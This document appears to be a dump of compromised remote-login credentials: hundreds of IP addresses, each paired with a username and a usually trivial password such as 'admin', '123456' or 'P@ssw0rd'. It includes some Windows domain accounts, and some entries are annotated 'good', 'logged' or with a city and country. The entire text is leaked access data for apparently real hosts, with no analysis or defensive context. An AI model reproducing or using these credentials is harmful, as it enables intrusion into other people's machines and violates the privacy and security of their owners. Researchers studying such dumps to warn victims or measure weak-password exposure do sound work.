186.226.68.140@administrador;1qaz2wsx 186.225.63.250@administrador;123456 186.244.224.18@administrador;123123 186.236.135.82@administrador;oracle 186.247.147.132@administrador;administrator 76.67.201.78@user;us 76.79.104.246@admin; 76.79.229.179@admin; 87.218.159.10@usuario;adm 88.3.91.19@administrador;12345678 194.30.41.236@Administrator;! 189.31.226.201@remoto;123456 177.10.193.100@user;sakhi 177.19.218.99@teste;1234 189.27.195.242@teste;123456 213.228.144.251@test;test 213.97.178.115@usuario1;usuario1 213.96.82.89@Alicia;Alicia 213.172.32.96@prueba;prueba 59.90.83.156@administrator;Password123 58.68.70.104@bharat;123456 59.90.207.164@administrator;password123 59.90.193.207@user4;123 59.90.193.254@user1;123 59.90.216.209@admin; 195.82.150.134@Test;test 81.35.210.231@usuario;0000 110.93.211.10@admin;0000 119.152.247.149@administrator;Abcd1234 180.92.159.138@administrator;11 186.109.90.227@remoto;remoto 189.139.147.138@Administrador;123 189.144.4.95@Administrador;admin 189.131.129.183@prueba;123 189.136.137.167@usuario1;1111 189.132.178.198@prueba;prueba 189.129.206.187@prueba;123456 148.244.226.124@prueba;prueba 189.134.60.45@Administrador;Abcd1234 189.132.123.117@Administrador;12345678 189.148.47.182@user1;user1 189.152.19.106@user;user 189.156.109.45@administrator;123456 189.128.215.135@prueba;prueba 189.152.123.73@Administrador;1234 189.146.213.15@remoto;123456 189.158.17.80@administrator;administrador 189.155.189.245@user1;user1 189.149.88.12@prueba;prueba 189.152.196.88@usuario1;1 189.155.226.157@user1;user1 189.152.148.82@prueba;prueba 189.155.196.24@user1;user1 189.158.202.2@user;user 46.24.140.114@usuario;usuario 217.12.247.142@admin;123456789 217.23.74.126@admin;1 217.23.146.245@admin;admin 217.25.227.194@user1;123321 217.170.125.222@test;123456 217.195.80.50@administrator;1234567 217.150.75.141@manager;123 202.108.135.131@user1;1 78.24.41.253@user1;123 203.191.168.52@test;Password1 78.29.14.144@user;12345 195.57.0.110@user;12345 195.93.170.24@test;P@ssw0rd 195.57.190.66@user6;user6 177.9.72.181@usuario,usuario 177.3.250.192@administrador;1 189.31.226.67@remoto;123456 46.183.183.54@user;23456 177.139.187.13@usuario;123 177.139.198.41@teste;123 93.20.170.28@user; 95.141.113.65@test;test 95.141.119.45@test;test 219.238.188.184@test;test 221.212.159.58@Administrator;Password1 124.128.37.62@Administrador;Password 59.125.186.6@user1;user1 59.125.209.38@user2;user2 60.248.58.82@user1;user1 77.229.166.30@usuario;0 84.94.115.80@administrator; 195.182.82.234@test;test 80.179.192.228@scan;scan 76.72.88.22@1;1 123.7.10.101@test;Password 123.108.250.138@administrator;1 201.122.92.2@administrator;Passw0rd 189.178.4.238@remoto;123456 201.144.165.68@Administrador;Password1 200.57.151.33@prueba;prueba 201.155.205.220@prueba;1 148.243.37.219@prueba;prueba 189.173.11.131@Administrador;1 189.155.249.195@remoto;09139415262 186.109.209.76@remoto;12345 186.130.208.76@remoto;123456 78.107.75.252@admin1;123456789 78.109.118.162@user1;123456 78.110.244.151@user;12345 78.140.62.180@user1;123 79.172.33.35@user;1 79.175.33.218@user1;1 80.73.203.177@user2;12345 80.76.235.5@user3;12345 80.82.50.175@user2;1 177.0.83.80@usuario;usuario 189.35.85.23@administrador;123 189.36.145.3@teste;teste 189.35.20.179@usuario;123 189.38.203.163@usuario;usuario 27.253.118.169@Administrator; 58.108.241.231@Administrator;@admin 177.33.112.230@Administrador; 177.97.36.121@administrador;senha 177.99.59.121@teste;123 79.120.113.77@admin; 79.127.112.143@admin;admin 79.108.0.62@administrador;12345678 79.103.3.185@administrator;12345 79.129.2.64@user4; 79.122.136.126@user1; 79.129.15.43@user1; 79.104.37.6@scan;000000 79.123.52.65@guest;password 79.123.23.208@reception; 117.6.134.27@admin; 117.6.64.15@administrator; 117.3.65.34@guest; 117.6.9.170@guest; 74.86.35.94@Test;test 74.86.35.92@Test;test 74.86.35.88@Test;test 74.86.35.89@Test;test 74.86.35.91@Test;test 74.86.35.95@Test;test 74.86.35.93@Test;test 74.86.35.90@Test;test 74.86.65.154@teste;123456 74.87.12.139@admin;admin 74.86.100.93@Test;test 74.87.124.69@user1; 74.86.207.80@scan;999999 79.140.1.64@admin; 79.144.165.50@administrador;admin 79.144.158.191@administrador;servidor 79.144.140.29@administrador; 79.144.218.18@administrador;admin 79.145.86.248@administrador; 79.141.207.52@Test;test 79.145.30.232@usuario; 79.148.46.159@usuario;1 79.148.98.244@admin1; 79.148.101.111@usuario; 79.147.203.4@usuario1; 79.148.79.96@almacen; 79.148.113.125@administrador;12345678 79.148.116.110@administrador;12345678 79.148.114.109@remoto1;remoto1 79.148.110.238@prueba;123456 79.148.104.179@scanner;scanner 79.148.126.138@administrador; 79.148.224.237@usuario; 79.148.123.97@usuario1;123456 79.148.118.235@pc;123456789 79.150.38.169@administrador;654321 79.148.230.157@server;123456 79.148.230.212@scanner;scanner 79.152.173.240@usuario; 79.148.241.156@usuario1;1234 79.169.106.6@remoto1;123456 79.165.213.201@admin; 79.156.64.185@administrador; 79.158.246.56@administrador;a 79.168.247.19@scanner;123456 79.170.231.143@admin;12345678 79.159.171.166@taller;taller 79.168.255.33@backup;backup 79.172.60.166@user1; 79.158.194.43@administrador;admin 79.157.203.213@usuario;1234 74.165.203.188@administrator;server 74.143.146.35@ASPNET; 74.130.232.165@admin; 74.122.192.98@administrator;changeme 212.145.172.94@usuario1;abcd1234 212.170.198.157@remoto;remoto 213.37.161.233@administrador; 187.35.76.29@administrador;123456 212.230.46.128@remoto;12345 187.35.68.51@usuario;123456 177.19.228.61@user1;teste 177.34.148.8@usuario;usuario 177.33.192.249@administrador;1234 177.68.77.144@teste;123 213.98.84.206@remoto;remoto 78.187.21.96@user1; 78.187.94.251@user1; 78.187.133.217@user; 220.248.7.114@guest; 78.187.156.209@user;123 78.187.211.96@guest; 83.36.56.115@server; 83.36.59.171@prueba;1234 83.36.62.95@ALMACEN;1234 1.34.86.191@user; 24.133.177.226@administrator;1 78.186.126.227@administrator;1 78.187.37.76@administrator;1 78.187.40.46@admin;123456 212.9.71.149@prueba;10 81.37.100.15@usuario1;1 82.151.215.154@user1; 83.69.176.171@manager; 83.219.130.30@user2; 83.246.143.72@user2;12345 84.22.133.148@user4;1 84.42.45.85@user2;123 84.204.176.170@user1; 46.48.170.134@user;123 81.222.82.62@manager;manager 78.189.14.182@user;1234 78.189.240.91@administrator;09139415262 81.213.152.119@administrator;123 78.189.102.135@user1;1234567 83.66.193.27@administrator;123 85.100.42.142@administrator;1 85.100.199.67@administrator;123456 85.103.43.159@administrator;1 85.102.235.233@administrator;123456 31.210.77.75@administrator;123321 46.1.103.207@administrator;1234 78.177.47.99@admin;12344321 78.183.14.136@administrator;1234 78.186.119.100@administrator;123456 78.165.181.18@administrator;12345678 85.133.225.146@Administrator;123456 217.219.196.20@Administrator;123 85.15.43.169@Administrator;123456 217.219.103.30@Administrator;1 80.191.156.209@Administrator;123456 84.241.36.52@Administrator;vahid 89.165.120.52@Administrator;123456 178.251.213.91@Administrator;123456 88.12.62.54@jose;jose 88.2.188.24@user4;user4 88.2.195.199@Usuario;123456 88.2.176.251@almacen;almacen 88.12.12.73@remoto;remoto 88.12.32.80@servidor;1 88.4.32.135@taller;taller 88.2.172.196@remoto;remoto 88.2.223.109@Usuario;1 88.12.14.167@Usuario;1234 2.139.231.164@admin; 31.59.145.121@test;1 187.5.17.85@user; 187.7.95.78@server;123 187.7.1.246@scanner;scanner 187.11.175.128@user;0 187.11.190.74@scanner;scanner 187.16.34.132@user; 187.143.212.119@bodega;bodega 187.143.212.119@agente;agente 200.161.119.33@teste;12qwaszx 201.6.123.53@usuario;usuario 200.217.178.202@usuario;123456 187.7.95.78@server;123 193.253.198.160@scan;scan 212.156.66.86@test;test 206.169.187.242@scan;scan 91.122.216.189@manager1;1234 91.122.195.34@sklad;12345 59.99.229.24@administrator;P@ssw0rd 59.90.236.178@manager;123 119.145.96.153@admin;123456 119.145.96.46@support; 186.202.184.123@administrator;1q2w3e 186.215.73.113@user; 186.215.141.186@user;1234567 186.215.100.186@scanner;scanner 186.218.153.175@administrator; 186.222.206.39@user;0 186.238.51.142@administrator;bangye 187.1.173.94@admin;000000 186.247.244.83@user2;123 123.51.18.193@scanner;scanner 72.240.120.141@user2;123 78.187.157.114@server;1 78.141.18.94@scanner;Passw0rd 193.219.135.177@scan;scan 183.63.217.68@test;test 195.97.106.14@manager; 217.128.35.82@test; 187.75.232.196@Administrator;Administrator 187.104.106.194@administrador;123456 187.85.23.170@administrador;1 187.127.236.2@Administrator;12345678 187.75.251.111@administrador; 187.37.107.114@administrador; 187.18.101.198@administrador;123 187.52.11.102@administrador;admin 187.54.178.98@administrador;Administrador 187.35.81.80@Administrator;superuser 187.45.35.202@administrador;123 187.111.221.6@administrador;123456 94.185.142.82@reception;qwerty123 94.143.244.66@oleg;1 81.149.168.178@admin;112233 83.38.220.255@administrador;servidor 187.54.72.10@administrador;servidor 182.73.196.35@test;test 190.11.202.185@adm;adm 189.17.184.58@Administrador;112233 80.34.18.56@administrador; 80.175.21.162@admin; 181.164.115.96@administrador;INTERNET 182.73.59.126@Administrator;passw0rd 80.28.210.35@administrador;qwerty 181.54.247.20@Administrator;Administrator 80.153.134.237@Administrator;Administrator 80.30.217.182@administrador; 200.204.87.42@Administrator;P@ssw0rd 219.91.143.209@Administrator;administrator 59.167.226.33@user;password 83.54.141.144@almacen;almacen 83.57.77.162@almacen;almacen 208.72.70.54@reception;password 77.228.171.115@anna;1234 79.148.122.207@almacen;almacen 210.3.0.193@computer;computer 210.17.176.114@user4;user4 81.39.147.167@administrador;servidor 62.82.215.202@almacen;almacen 83.59.159.93@jose;jose 58.211.138.58@test;test 87.126.246.239@Administrator;123456789 62.82.215.199@almacen;almacen 180.148.2.47@Administrator;adminserver 58.23.127.68@Administrator;demo 58.47.128.146@Administrator;123 87.216.218.25@administrador;1234 58.68.78.60@temp;temp 59.36.98.61@support;backup 83.61.9.179@servidor;0 202.177.254.244@user1;user1 84.217.226.197@user;123456 81.19.38.84@administrador;ronaldo 46.24.237.145@almacen;0000 62.82.215.195@almacen;almacen 46.27.202.200@administrador;admin 175.136.245.34@user4;user4 202.155.254.149@test;123456 151.1.217.220@Administrator;administrator 38.104.30.158@tester;letmein 87.241.166.132@user1;user1 87.249.234.38@manager1;123 115.135.106.100@test;test 58.215.81.40@support;user 203.35.165.49@temp;11111 58.177.237.58@temp;temp 165.228.183.195@user;password 85.70.187.152@operator;0000 203.88.129.50@computer;computer 88.2.238.110@administrador;qwerty 80.32.19.93@administrador;123456 210.245.3.139@admin;admin 76.79.229.179@admin;administrator 76.196.53.246@user1;12345 180.73.198.50@Administrator;admin123 108.180.231.29@office;office 93.153.10.173@Administrator;vahid 96.57.134.59@Administrator;administrator 88.32.35.218@Administrator;Administrator 219.89.83.145@Administrator;passw0rd 46.65.220.89@test;test 88.102.142.212@sklad;123 62.38.219.148@Administrator;admin 190.108.199.183@Administrator;opera 2.139.237.84@almacen;1q2w3e4r 62.38.142.15@Administrator;INFO 124.30.145.90@1;12345 180.166.18.83@Administrator;123456 217.91.236.223@Administrator;1234567 60.12.10.68@admin; 62.38.125.233@user1;1 62.149.95.242@adm;123 2.139.182.48@vlad;abc 208.111.10.194@adm;root 217.91.13.45@admins;1 80.37.71.125@administrador;1111 181.164.32.27@administrador; 200.220.139.138@teste;123 200.161.122.109@administrador;servidor 177.106.130.74@usuario;1234 177.34.156.138@teste;1234 189.36.151.14@teste;123456 189.48.207.174@administrador;123456 189.31.191.67@teste;123 189.39.157.2@administrador;master 189.41.106.39@user;123 189.124.116.131@admin;123 189.26.147.169@administrador;adm 189.47.161.151@teste;12345678 217.219.182.108@remote;remote 118.175.64.125@admin;p@ssw0rd 196.202.31.211@admin;123 81.214.86.137@user2;123456 213.174.1.68@test;1234567890 62.38.219.148@administrator;administrator 201.41.62.145@administrator;administrator 74.253.103.120@Administrator;admin 177.19.228.156@admin;admin 81.43.125.96@user;pass 178.63.73.212@user;user 202.124.98.231@test;test 69.224.81.182@test;password 182.72.68.156@user1;user1 220.130.236.139@user1;12345 217.128.33.157@test;test 178.248.71.138@user1;12345 93.72.133.51@user;123 83.206.111.113@scan;scan 212.119.200.172@manager;manager 99.108.77.6@user;user 63.253.168.125@test;password 84.54.143.24@test;test 200.168.9.192@user;123 78.93.236.78@user1;user1 173.49.119.228@user1;1234 62.97.60.217@user1; 89.175.174.154@test;123 213.55.12.57@test;test 81.13.103.3@User1;123 81.19.131.82@User1;1234567 81.23.194.154@1;1 81.23.150.73@User2;123456 81.25.164.31@irina;123456 81.30.196.142@1;1 81.26.88.164@director;123 81.91.55.142@User1;user1... 213.187.252.59@user1;123 217.114.181.178@test;1 46.146.241.30@test;111 95.170.183.40@user1;111 95.188.102.88@manager;123 85.113.206.202@user;123 195.208.154.157@user1;1 188.17.159.195@user1;123 95.128.241.135@test;test 95.154.94.74@admin;1 79.135.66.104@sklad;123 217.145.145.126@user;qwerty123 87.229.164.106@user;123 78.25.61.233@user1;123 85.105.163.128@test;test 75.28.158.238@admin;admin 70.240.142.18@administrator;administrator 213.241.198.242@admin;asdasd 217.7.123.42@administrator;start 217.7.219.45@admin;tester 217.24.14.92@admin;install 217.79.2.198@admin;1 217.91.17.203@administrator;start 217.91.43.168@administrator;win2003 217.91.121.236@admin;install 217.91.149.56@admin;test 83.239.191.195 Admin;1967 77.120.38.47@admin;1 77.109.44.249@administrator;1 77.121.124.66@admin;123 77.121.163.45@admin;1 77.122.13.212@admin;1 77.122.15.199@admin;1 77.52.108.47@admin;123 89.253.41.118@admin;1 87.126.232.67@test;123456 193.200.69.42@administrator;main 193.200.38.114@user;1234567 193.200.32.249@1;1 194.12.228.80@administrator;1 194.12.228.229@administrator;qazwsx 193.200.187.51@user;user 194.146.235.66@user;user 195.230.16.82@sys;1234565 213.16.34.238@sys;1 213.91.193.129@Admin;123456 212.116.159.156@test;test 213.91.192.68@user;1234 213.91.194.153@user;zxcvbn 213.91.247.79@Admin;123 213.91.241.224@user;1234 213.222.34.138@administrator;123456 213.145.115.35@user;123 213.169.51.152@user;1 213.91.220.226@user;123qwe 213.169.52.78@user;1234 87.97.237.62@user;123qwe 87.126.44.101@user;123 87.126.55.32@user;123 87.126.246.15@user;123 87.126.251.146@user;1 195.96.228.242@administrator;P@ssw0rd 212.25.38.65@administrator;1 62.56.170.243@administrator;admin 62.219.153.37@administrator;administrator 62.90.58.131@user;user 62.219.153.37@administrator;super 62.219.196.215@administrator;4444 82.166.44.117@administrator;123456 84.108.254.238@administrator;secret 88.153.233.25@user;user 84.229.235.131@administrator;123 80.178.5.231@user;1234 24.232.68.11@Admin;admin 24.232.232.11@Admin;admin 168.226.214.32@Admin;academia 168.226.146.7@user;123 62.165.46.149:administrator;123456 62.168.148.194:administrator;Admin 62.168.172.82:administrator;12345 86.65.57.246:admin;admin 86.68.118.87:administrator;password 80.97.10.150:administrator;12345 85.91.141.196@user;P@ssw0rd 85.91.150.94@user;123456 85.130.36.51@user;1 85.130.58.185@sys;1234565 87.126.64.159@administrator;12345678 87.126.44.2@user;1234 87.126.142.221@administrator;1 87.126.111.94@Admin;adm1n 87.126.204.154@administrator;qwerty 87.126.210.31@user;1 88.80.137.62@administrator;1111 87.126.248.146@user;1 216.252.25.108@user;1234 216.254.85.227@support;password123 62.244.212.243@administrator;123456 81.213.167.199@administrator;1 81.213.174.168@administrator;1 81.213.125.19@administrator;1 81.213.77.241@administrator;123456 81.213.198.170@administrator;123 81.213.155.94@administrator;P@ssw0rd 62.48.201.61@administrator;manager 62.48.203.138@Admin;nimda 82.151.121.100@test;1 216.240.7.45@user;password 62.105.152.50@test;12345 187.85.203.250@user;1234 190.17.142.100@admin;123 2.112.83.234@test;test 168.187.71.184@admin;P@ssw0rd 88.250.123.224@manager;1 187.198.185.95@Administrador;123 178.72.85.68@manager;123 213.108.174.74@user;user 122.160.14.71@user;user 77.235.202.86@test;test 190.137.243.157@Administrador;1234 123.30.23.116@admin;admin 95.38.206.237@admin;admin 115.85.70.180@Administrator;P@ssw0rd 199.203.9.211@user;1234 203.191.168.226@test;test 59.152.245.138@user;12345 59.125.58.18@test;test 99.62.12.233@user;1234 203.149.185.120@test;P@ssw0rd 86.98.61.10@user1;123 70.63.7.203@user1;Passw0rd 125.72.160.230@Administrator;12345 210.7.16.205@remote;remote 111.93.187.138@Administrator;P@ssw0rd 94.158.54.34@Administrator;admin 109.188.65.42@manager;1 70.40.63.35@test;test 159.224.85.40@test;test 210.24.117.231@admin;manager 77.88.132.219@Administrator;admin 200.106.86.97@Administrador;123 212.64.161.111@user1;user1 190.0.53.54@Administrador;admin 190.73.237.219@Administrator;admin 37.25.54.103@admin;password 115.66.205.125@user1;user1 93.63.251.7@sys;123 187.66.48.152@Administrador;manager 177.139.142.22@Administrador;1234 213.27.239.211@Administrador;1234 109.74.50.32@admin;123 201.55.165.22@user1;1234 190.57.144.22@Administrador;admin 201.120.67.226@administrator;1 201.100.32.189@prueba;1 201.114.61.25@Administrador;123 201.103.173.134@remoto;12345 201.101.9.113@prueba;prueba 222.74.223.221@test1;12345678 222.75.151.182@user1;123 222.171.93.201@user1;1 218.17.220.81@test1;P@$$w0rd 221.2.89.182@administrator;1 125.32.113.118@server;P@ssword 83.32.125.66@admin;admin 83.32.82.219@usuario1;1234 83.33.146.210@remoto;123456 201.155.87.62@prueba;12345 201.155.230.5@Administrador;1234567 201.155.189.10@prueba;12 201.156.1.147@prueba;prueba 201.170.43.164@administrator;123 201.165.124.50@prueba;1234 201.172.244.42@prueba;prueba 148.235.79.244@prueba;123456 177.0.51.234@administrador; 177.0.65.130@servidor;123456 177.0.82.112@remoto;remoto 124.128.37.62@Administrador;Password 76.79.229.179@user;user 76.79.104.246@user;user 194.30.41.236@user;user 38.82.206.34@user;user 74.101.57.23@test;test 75.125.15.234@user1;user1 208.71.48.170@student;123 72.18.234.132@user;user 12.53.113.139@user;user 173.220.23.162@user;user 72.25.125.102@user;user 31.194.99.109@user;user 64.245.115.242@user;user 62.38.220.113@user;user 172.0.179.201@user;user 85.105.49.89@user;1 98.189.136.11@user;user 173.13.152.126@user;user 218.192.55.6@user;user 12.193.88.5@user;user 213.219.157.147@user;user 69.198.194.90@user;user 82.78.195.254@test;test 46.47.199.90@test;test 193.251.65.216@test;test 190.67.162.226@user;1234 212.120.209.156@user;123 109.74.128.190@test;test 88.26.209.5@test;test 207.164.177.210@test;test 49.248.101.143@test;test 62.215.133.26@test;test 221.181.211.35@user;123 212.74.218.206@test;test 175.139.144.4@test;test 89.145.200.66@admin;admin 86.57.244.81@test;test 119.203.160.244@test;test 109.80.18.172@admin;admin 183.182.89.201@test;test 58.137.115.29@test;test 202.83.214.18@test;test 65.211.29.3@admin;admin 87.139.98.163@admin;1234 91.192.61.5@test;123 193.251.5.195@test;test 212.81.209.34@admin;123 188.165.75.120@test;123 74.93.134.9@administrator;admin 79.120.76.58@test;test 75.146.215.133@test;test 83.211.138.117@administrator;admin 78.186.20.230@administrator;1 95.240.173.137@administrator;admin 189.62.202.132@admin;admin 58.137.173.12@test;test 67.106.147.106@administrator;admin 178.72.237.34@test;test 58.128.177.190@test;test 206.169.46.245@test;test 95.45.225.93@administrator;admin 208.80.239.233@user;user 169.244.21.34@user;1 184.71.68.54@administrator;admin 62.215.133.27@test;test 182.71.176.91@test;test 117.218.51.216@user;123 61.78.63.85@test;test 180.150.242.150@user1;1234 209.183.69.218@test;test 175.139.242.180@administrator;1234 72.55.164.46@user;user 202.147.189.131@administrator;123 122.201.246.187@administrator;admin 190.37.234.27@user1;123 85.105.246.126@user1;user1 114.32.44.207@administrator;1234 182.71.81.210@user;user 184.172.35.106@user;user 92.126.217.185@user1;1 80.37.210.114@admin;admin 95.170.181.82@user1;1234 91.196.76.70@administrator;admin 61.17.39.248@user;user 195.72.241.147@user;1 120.38.60.33@administrator;123 85.72.49.159@administrator;admin 37.53.66.157@user2;1 203.176.142.202@user;user 79.129.55.152@user;1234 80.228.76.130@administrator;admin 122.160.53.220@user;admin 220.132.110.208@administrator;admin 220.255.180.175@user1;user1 183.102.14.38@administrator;1234 178.23.215.6@administrador;admin 190.39.8.254@user1;1 121.28.40.240@user2;123 85.71.180.253@test;test 221.195.110.69@administrator;server 111.1.79.240@administrator;1 110.167.126.114@administrator;123 212.19.21.227@user1;123 59.126.254.141@user1;user1 118.186.253.205@administrator;admin 114.255.121.186@administrator;123 218.145.31.243@user1;user1 46.146.227.195@user1;123 201.74.173.112@admin;admin 87.117.40.117@user;1 61.148.69.18@administrator;1 80.28.51.105@administrador;admin 187.53.192.234@user2;user2 41.32.156.214@user;1234 116.208.7.23@user;test 222.185.235.174@user;1234 219.128.252.254@test;test 200.68.99.217@administrador;admin 202.78.74.37@administrator;p@ssw0rd 88.3.170.189@administrador;admin 66.160.138.83@user;user 60.54.192.108@test;test 41.134.33.178@administrator;p@ssw0rd 117.218.145.111@1;1 208.38.69.73@administrator;admin 181.31.194.117@administrador;1234 220.178.80.138@admin;admin 78.187.40.7@1;1 115.133.159.78@administrator;p@ssw0rd 80.32.210.82@server;server 220.166.95.178@administrator;1 93.107.101.65@test;test 60.169.17.167@administrator;admin 212.38.48.93@administrator;admin 212.98.191.228@test;test 41.131.106.66@user;user 220.163.107.114@administrator;123 203.45.212.72@test;test 117.218.57.58@user1;123
  20. 82.78.195.254@test;test 193.251.65.216@test;test 109.74.128.190@test;test 62.215.133.26@test;test 217.128.33.157@test;test 212.74.218.206@test;test 175.139.144.4@test;test 83.228.32.145@test;123 86.57.244.81@test;test 119.203.160.244@test;test 58.137.115.29@test;test 202.83.214.18@test;test 87.139.98.163@admin;1234 75.146.215.133@test;test 58.137.173.12@test;test 82.201.213.18@test;123 178.72.237.34@test;test 80.228.76.130@administrator;admin 178.23.215.6@administrador;admin 111.1.79.240@administrator;1 201.74.173.112@admin;admin 41.134.33.178@administrator;p@ssw0rd 208.38.69.73@administrator;admin 181.31.194.117@administrador;1234 115.133.159.78@administrator;p@ssw0rd 220.166.95.178@administrator;1 93.107.101.65@test;test 60.169.17.167@administrator;admin 76.79.229.179@user;user 76.79.104.246@user;user 194.30.41.236@user;user 151.1.217.220@user;user 80.153.134.237@user;user 202.124.150.15@user;user 201.120.67.226@user;user 38.82.206.34@user;user 74.101.57.23@test;test 75.125.15.234@user1;user1 208.71.48.170@student;123 72.18.234.132@user;user 12.53.113.139@user;user 63.138.49.238@user;user 72.25.125.102@user;user 66.245.228.152@user;user 189.201.242.131@user;user 64.245.115.242@user;user 46.47.199.90@test;test 88.26.209.5@test;test 77.235.202.86@test;test 193.251.70.106@test;test 74.86.35.95@test;test 207.164.177.210@test;test 49.248.101.143@test;test 183.182.89.201@test;test 91.192.61.5@test;123 193.251.5.195@test;test 188.165.75.120@test;123 79.120.76.58@test;test 58.128.177.190@test;test 206.169.46.245@test;test 200.89.138.202@administrator;administrator 95.45.225.93@administrator;admin 184.71.68.54@administrator;admin 62.215.133.27@test;test 182.71.176.91@test;test 61.78.63.85@test;test 209.183.69.218@test;test 175.139.242.180@administrator;1234 202.147.189.131@administrator;123 122.201.246.187@administrator;admin 114.32.44.207@administrator;1234 61.233.11.58@administrator;administrator 91.196.76.70@administrator;admin 120.38.60.33@administrator;123 85.72.49.159@administrator;admin 220.132.110.208@administrator;admin 183.102.14.38@administrator;1234 85.71.180.253@test;test 221.195.110.69@administrator;server 110.167.126.114@administrator;123 118.186.253.205@administrator;admin 114.255.121.186@administrator;123 61.148.69.18@administrator;1 80.28.51.105@administrador;admin 200.68.99.217@administrador;admin 202.78.74.37@administrator;p@ssw0rd 88.3.170.189@administrador;admin 60.54.192.108@test;test 212.98.191.228@test;test 203.45.212.72@test;test 182.71.81.210@user;user 85.105.246.126@user1;user1 117.218.57.58@user1;123 78.187.40.7@1;1 37.53.66.157@user2;1 122.160.53.220@user;admin 187.53.192.234@user2;user2 80.32.210.82@server;server 113.161.161.138@1;1 201.74.173.112@admin;admin 72.55.164.46@user;user 92.126.217.185@user1;1 95.170.181.82@user1;1234 222.185.235.174@user;1234 205.247.32.226|reports|reports 216.199.120.51|conference|conference 216.31.233.114|conference|conference 70.164.244.143|assistant1|assistant1 71.119.17.63|user1|123456 71.172.10.26|assistant|assistant 71.178.172.73|support|support 71.86.30.194|conference|conference 72.156.49.148|assistant|assistant 216.136.158.168|assistant1|assistant1 64.47.117.39|exmerge|exmerge 169.244.176.172|staff|staff1 38.108.40.177|GADOMAIN\backupexec|backup 96.57.31.130|SMALLBUSINESS\backup|treicoaste001 66.115.24.151|backup|nagasaki001 206.169.37.75|backup|nagasaki001 64.238.119.130|CHECKER\shop1|nagasaki 65.210.152.6|cafeuser|cafeuser 208.4.156.36|TERMINAL\backup|nagasaki001 209.159.35.91|backup|nagasaki001 96.33.254.153|warehouse|warehouse 71.14.23.70|AQF\shipping|shipping 72.16.183.187|ACG\shipping|shipping 74.7.73.202|NS\shipping|shipping 216.231.26.219|CPH-CORP\install|install 74.113.142.69|TACYMEDICAL\shipping|password 72.32.87.77|256793-WEB1\install|install 70.43.46.210|SURVIVALARMOR\cafeuser|cafeuser 65.48.30.5|KSK\tom|tom 67.113.205.148|DOMAIN3\clerk|password 199.36.85.139|GSCLEGAL\scans|scans 207.178.196.148|WD\clerk|password 207.47.91.245|PAMCO\David|trustno1 208.180.56.237|testing|123456 209.116.58.15|copier|password 209.254.12.115|conference| 216.215.108.114|shipping|shipping1 216.31.252.148|test1|test 64.165.183.44|diamondsharp\parts|parts 188.173.254.166@Administrator;password 80.32.129.14@Administrator;password 62.96.52.66@Administrator;password 216.14.19.42@Administrator;password 208.80.239.233@Administrator;password 31.194.99.109@Administrator;password 219.88.71.151@Administrator;password 97.67.6.105@Administrator;password 109.2.59.192@conference;grace 62.38.219.148@conference;grace 213.247.120.205@conference;grace 12.53.113.139@conference;grace 66.208.184.171@conference;grace 63.138.49.238@conference;grace 75.127.54.179@conference;grace 217.145.242.149@administrator;12380.191.104.102@administrator;123 173.243.81.142@user;user 69.85.255.102@user;user 72.12.127.236@user;user 67.23.218.178@user;user 71.149.175.74@user;user 75.149.172.25@user;server 77.245.129.66@test;test 66.245.228.152@user;user 193.251.70.106@test;test 213.182.230.58@test;test 78.90.64.226@test;test 109.71.183.66@test;1 174.141.98.44@test;test 37.148.230.63@admin;admin 83.228.32.145@test;123 82.201.213.18@test;123 210.44.1.5@test;test 87.139.163.253@administrator;admin 99.91.142.46@test;123 24.186.51.106@admin;admin 62.94.154.3@administrator;admin 108.179.51.227@admin;admin 89.120.92.142@user1;1234 87.139.138.184@administrator;admin 194.44.94.204@administrator;1 74.111.167.72@administrator;administrator 184.70.9.234@administrator;admin 59.152.246.230@admin;admin 94.84.221.126@administrator;admin 200.89.138.202@administrator;administrator 208.96.234.74@administrator;admin 202.136.220.78@admin;123 213.34.215.74@administrator;administrator 121.170.101.63@administrator;admin 61.233.11.58@administrator;administrator 78.186.200.14@user1;123456 79.148.118.98@administrador;admin 119.6.100.131@administrator;1 175.98.145.200@administrator;admin 80.32.112.55@administrador;123 80.38.13.221@administrador;admin 213.98.179.14@administrador;admin 189.72.101.73@administrador;1234 221.2.55.234@administrator;administrator 78.85.32.125@user1;user1 200.146.215.112@oficina;1234 200.146.215.113@oficina;1234 200.146.215.114@oficina;1234 200.146.215.115@oficina;1234 200.146.215.117@oficina;1234 200.146.215.118@oficina;1234 200.146.215.119@oficina;1234 82.207.40.204@1c_user2;123 82.207.23.43@Alexandr;1 82.207.74.120@Buhgalter;1 82.207.32.159@buxgalter;1 82.207.96.138@Kassa1;1 82.207.41.253@Marina;123 83.69.113.170@user1;123 85.95.136.23@elena;1 80.70.233.143@sveta;1 81.25.164.31@elena;123456 202.191.247.99@user2;123 72.18.234.132@administrator; 94.107.252.243@user;user 201.0.131.59@user;1234 96.57.134.59@user;user 82.207.74.120@sklad;1 195.5.19.174@sklad;123456 97.67.2.234@user;user -- 72.18.234.132@user;user, 80.228.29.18@user;user 65.38.212.27@user;user 202.124.150.13@user;user 80.14.248.105@test;test 81.25.47.143@sklad;0 -good 121.246.64.37@admin;123 80.28.134.78@administrador;123456 210.4.56.81@user1;user1 -logged 189.45.48.114@user;user 203.186.80.24@user;user 94.81.137.126@user;user 208.234.33.211@user;user 2.112.88.181@user;user 201.120.67.226@user;user 151.1.217.220@user;user 74.43.111.215@user;user 74.253.103.120@user;user 63.138.49.238@user;user 186.238.51.142@user;user 190.85.188.74@user;user 77.105.43.195@user;123 196.219.169.235@test;123456 80.153.134.237@user;user 80.73.1.4@user;user 202.124.150.15@user;user 217.21.249.12@user;user 201.120.67.226@administrator;pass 81.25.47.143@sklad;0 210.4.56.81@user1;user1 58.131.6.85@user1;123 142.165.61.12@user;user 170.2.4.199@user;user 196.218.150.114@user;user 118.99.206.225@user1;user1 77.43.60.53@user;user 200.129.173.3@user;user 187.115.67.231@admin;123 59.90.206.174@user1;user1 77.94.103.135@user1;1 175.139.144.6@test;test 165.138.167.9@test;test 219.92.72.122@user;user 189.201.242.131@user;user 66.160.138.85@user;user 199.26.210.245@user;user 70.182.119.150@user;user 77.28.98.47@user;user 95.79.54.42@test;test 196.217.240.20@user1;123 217.66.229.202@user;123456 95.79.96.55@test;test 96.33.254.153;warehouse;warehouse --United States-TN-Kingsport 96.52.247.150;remote;remote Canada-AB-Edmonton ** 63.138.101.109;sales;sales United States-NY-Fairport 96.22.115.162;camera;camera Canada-QC-Montreal ** 216.174.238.58;counter;counter United States-WA-Yakima ** 216.174.238.82;counter;counter United States-WA-Yakima 216.196.206.194;office;staff United States-- 63.239.79.46;student;student United States-AZ-Chinle 216.174.238.58;counter;counter United States-WA-Yakima 63.230.130.70;user;user United States-WA-Spokane 